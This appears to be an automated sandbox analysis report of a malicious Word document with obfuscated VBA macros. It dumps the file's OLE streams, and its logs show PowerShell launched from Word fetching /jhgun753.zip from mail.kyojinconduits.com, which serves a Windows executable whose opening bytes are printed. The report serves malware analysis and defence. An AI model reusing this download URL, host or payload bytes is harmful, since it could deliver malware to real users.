                    Stream Size:699
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 c8 db 96 a0 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    Attribute
                    VB_Name
                    VBA Code

                    Streams

                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                    General
                    Stream Path:\x1CompObj
                    File Type:data
                    Stream Size:146
                    Entropy:4.00187355764
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                    General
                    Stream Path:\x5DocumentSummaryInformation
                    File Type:data
                    Stream Size:4096
                    Entropy:0.279768695397
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 496
                    General
                    Stream Path:\x5SummaryInformation
                    File Type:data
                    Stream Size:496
                    Entropy:3.97708413058
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 68 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                    Stream Path: 1Table, File Type: data, Stream Size: 6673
                    General
                    Stream Path:1Table
                    File Type:data
                    Stream Size:6673
                    Entropy:6.06833302007
                    Base64 Encoded:True
                    Data ASCII:f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                    Data Raw:66 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 00 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                    Stream Path: Data, File Type: data, Stream Size: 20897
                    General
                    Stream Path:Data
                    File Type:data
                    Stream Size:20897
                    Entropy:7.74612259243
                    Base64 Encoded:True
                    Data ASCII:. Q . . D . d . . . . . . . . . . . . . . . . . . . . . V m . 4 N . N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . P . . . . 3 . . . . f . o . . . . . T Y . . . . P . . . . . . D . . . . . . . . F . . . P . . 3 . . . . f . o . . . . . T Y . . . . . . .
                    Data Raw:a1 51 00 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 56 6d bc 34 4e 01 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 506
                    General
                    Stream Path:Macros/PROJECT
                    File Type:ASCII text, with CRLF line terminators
                    Stream Size:506
                    Entropy:5.52432570926
                    Base64 Encoded:True
                    Data ASCII:I D = " { 9 C A F 4 F 0 2 - 7 4 5 4 - 4 8 5 5 - 9 B E D - 4 9 3 6 5 C B 2 A F 2 0 } " . . D o c u m e n t = H c p s c l o 3 w 5 h / & H 0 0 0 0 0 0 0 0 . . M o d u l e = X 3 l 1 w u p 0 i f e b . . M o d u l e = T y 1 9 1 w z 8 h y n v 3 f l . . E x e N a m e 3 2 = " H o e j y 5 5 g z a w 3 0 l l g " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 B 7 9 9 F B 1 8 F B 5 8 F B 5 8 F B 5 8 F B 5 " . . D P B = " 6 7 6
                    Data Raw:49 44 3d 22 7b 39 43 41 46 34 46 30 32 2d 37 34 35 34 2d 34 38 35 35 2d 39 42 45 44 2d 34 39 33 36 35 43 42 32 41 46 32 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 48 63 70 73 63 6c 6f 33 77 35 68 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 58 33 6c 31 77 75 70 30 69 66 65 62 0d 0a 4d 6f 64 75 6c 65 3d 54 79 31 39 31 77 7a 38 68 79 6e 76 33 66 6c 0d 0a 45 78 65 4e 61
                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 125
                    General
                    Stream Path:Macros/PROJECTwm
                    File Type:data
                    Stream Size:125
                    Entropy:3.69250522563
                    Base64 Encoded:False
                    Data ASCII:H c p s c l o 3 w 5 h . H . c . p . s . c . l . o . 3 . w . 5 . h . . . X 3 l 1 w u p 0 i f e b . X . 3 . l . 1 . w . u . p . 0 . i . f . e . b . . . T y 1 9 1 w z 8 h y n v 3 f l . T . y . 1 . 9 . 1 . w . z . 8 . h . y . n . v . 3 . f . l . . . . .
                    Data Raw:48 63 70 73 63 6c 6f 33 77 35 68 00 48 00 63 00 70 00 73 00 63 00 6c 00 6f 00 33 00 77 00 35 00 68 00 00 00 58 33 6c 31 77 75 70 30 69 66 65 62 00 58 00 33 00 6c 00 31 00 77 00 75 00 70 00 30 00 69 00 66 00 65 00 62 00 00 00 54 79 31 39 31 77 7a 38 68 79 6e 76 33 66 6c 00 54 00 79 00 31 00 39 00 31 00 77 00 7a 00 38 00 68 00 79 00 6e 00 76 00 33 00 66 00 6c 00 00 00 00 00
                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3955
                    General
                    Stream Path:Macros/VBA/_VBA_PROJECT
                    File Type:data
                    Stream Size:3955
                    Entropy:5.13659906094
                    Base64 Encoded:False
                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 658
                    General
                    Stream Path:Macros/VBA/dir
                    File Type:data
                    Stream Size:658
                    Entropy:6.38459690922
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                    Data Raw:01 8e b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 bf c1 ee 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                    Stream Path: WordDocument, File Type: data, Stream Size: 24217
                    General
                    Stream Path:WordDocument
                    File Type:data
                    Stream Size:24217
                    Entropy:3.62986490868
                    Base64 Encoded:True
                    Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . Y . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . b . . . b . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 d9 59 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 5e 00 00 62 7f 00 00 62 7f 00 00 d9 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2021 02:32:51.109204054 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.302309036 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.302453041 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.305320978 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.505866051 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.505934000 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.505969048 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.506007910 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.506045103 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.506083965 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.506130934 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.506175041 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.506211996 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.506248951 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.506329060 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.506378889 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.506386042 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.699462891 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699521065 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699561119 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699598074 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699635029 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699655056 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.699685097 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699687004 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.699728966 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699744940 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.699767113 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699805021 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699817896 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.699842930 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699877977 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.699899912 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.893017054 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893076897 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893115044 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893152952 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893191099 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893227100 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893265009 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893302917 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893351078 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893426895 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893435955 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.893469095 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.893472910 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893474102 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.893512011 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893549919 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:51.893551111 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893589973 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:51.893621922 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.087754011 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.087815046 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.087853909 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.087901115 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.087943077 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.087980032 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088017941 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088054895 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088093042 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088130951 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088167906 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088167906 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.088202953 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.088208914 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.088215113 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088237047 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.088258028 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088295937 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088334084 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088335991 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.088371992 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088402987 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.088408947 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088448048 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088475943 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.088485956 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088532925 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.088548899 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.091725111 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.282442093 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282501936 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282538891 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282571077 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282601118 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282630920 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282660961 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282691002 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282708883 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.282723904 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282742023 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.282756090 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282793045 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282820940 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.282826900 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282855988 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282885075 CET4916780192.168.2.22198.54.126.36
                    Jan 14, 2021 02:32:52.282885075 CET8049167198.54.126.36192.168.2.22
                    Jan 14, 2021 02:32:52.282916069 CET8049167198.54.126.36192.168.2.22

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2021 02:32:51.005683899 CET5219753192.168.2.228.8.8.8
                    Jan 14, 2021 02:32:51.090389013 CET53521978.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Jan 14, 2021 02:32:51.005683899 CET192.168.2.228.8.8.80x7e45Standard query (0)mail.kyojinconduits.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Jan 14, 2021 02:32:51.090389013 CET8.8.8.8192.168.2.220x7e45No error (0)mail.kyojinconduits.com198.54.126.36A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • mail.kyojinconduits.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249167198.54.126.3680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2021 02:32:51.305320978 CET0OUTGET /jhgun753.zip HTTP/1.1
                    Host: mail.kyojinconduits.com
                    Connection: Keep-Alive
                    Jan 14, 2021 02:32:51.505866051 CET1INHTTP/1.1 200 OK
                    Date: Thu, 14 Jan 2021 01:32:51 GMT
                    Server: Apache
                    Last-Modified: Sun, 03 Jan 2021 06:35:59 GMT
                    Accept-Ranges: bytes
                    Content-Length: 303616
                    Content-Type: application/zip
                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 aa e0 fe 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 72 04 00 00 2c 00 00 00 00 00 00 e0 1c 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 63 00 00 c8 00 00 00 00 f0 04 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 68 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 19 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 0a 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 1c 00 00 00 60 00 00 00 1e 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 50 02 00 00 00 80 00 00 00 04 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 34 00 00 cc 52 04 00 00 90 00 00 00 54 04 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 e8 00 00 00 00 f0 04 00 00 02 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 05 00 00 00 00 05 00 00 06 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec c7 05 a8 7c 00 10 39 92 00 10 a1 a8 7c 00 10 2d 35 02 00 00 a3 a8 7c 00 10 a1 a8 7c 00 10 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 56 8b 45 0c 89 45 fc 8b 0d ac 7c 00 10 89 4d 08 68 5c 11 00 00 6a 00 ff 15 74 60 00 10 8b 55 fc 8d b4 02 66 a1 06 00 68 5c 11 00 00 6a 00 ff 15 74 60 00 10 03 f0 8b 45 08 03 30 8b 4d 08 89 31 8b 55 08
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_!2r,0ch.text `.rdata0@@.2@ @@.rdata2P"@@.data`$@.text5PB @.text4RTF @.rsrc@@.reloc@BU|9|-5||]UQVEE|Mh\jt`Ufh\jt`E0M1U


                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:02:32:34
                    Start date:14/01/2021
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                    Imagebase:0x13f9d0000
                    File size:1424032 bytes
